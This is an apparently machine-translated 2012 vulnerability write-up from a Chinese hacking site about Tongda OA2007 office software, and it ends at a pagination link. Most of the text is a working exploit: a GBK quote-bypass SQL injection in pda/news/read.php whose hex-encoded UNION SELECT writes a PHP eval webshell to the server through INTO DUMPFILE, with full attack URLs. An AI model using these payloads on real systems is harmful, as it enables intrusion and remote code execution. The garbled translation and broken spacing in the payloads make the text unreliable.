Mastery OA2007 version vulnerability and getshell-a vulnerability warning-the black bar safety net

2012-12-18T00:00:00
ID MYHACK58:62201236230
Type myhack58
Reporter 佚名
Modified 2012-12-18T00:00:00

Description

Currently testing mastery OA2007 version

Office Anywhere 2 0 0 7 network intelligent office systems

http://127.0.0.1/pda/news/read.php?P=%cf' pig points. Storm web directory..

This time looked under the code, there is injected into the variables of the statements in the first 3 fields in the file below is in addition a select statement to call a, Emmanuel a flash, probably the idea is this

For example: SELECT * from USER where USER_ID='{$USERNAME}'

Where there are so section of the field statement$PROVIDER = $ROW['PROVIDER'];is the following statement$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";brought into the query.

This time we are not can be used in combination?

The first statement is the start of injection and union select 1,2,3,4,5,6,7,8,9,10..., such as the 3rd is the PROVIDER field, we thus

union select 1,2,'UNION SELECT 1,1,1,'<? php eval($v);?& gt;',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4, 5,6,7,8,9,1 0

Such a'UNION SELECT 1,1,1,'<? php eval($v);?& gt;',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#this statement into the second statement to write the webshell.

So the question is, single quotation marks can be? Of course not,^_^and...

Then we string format into the To hex encoding

%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,1 0,1 1,1 2,1 3,1 4,1 5,1 6%2 3

Test ok, get oa of the webshell

pda/news/read. php? P=%cf'Or%2 8 1=1%2 9% 2 3&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527443a2f4d594f412f776562726f6f742f6d2e7068702723,5,6,7,8,9,1 0,1 1,1 2,1 3,1 4,1 5,1 6%2 3

[1] [2] next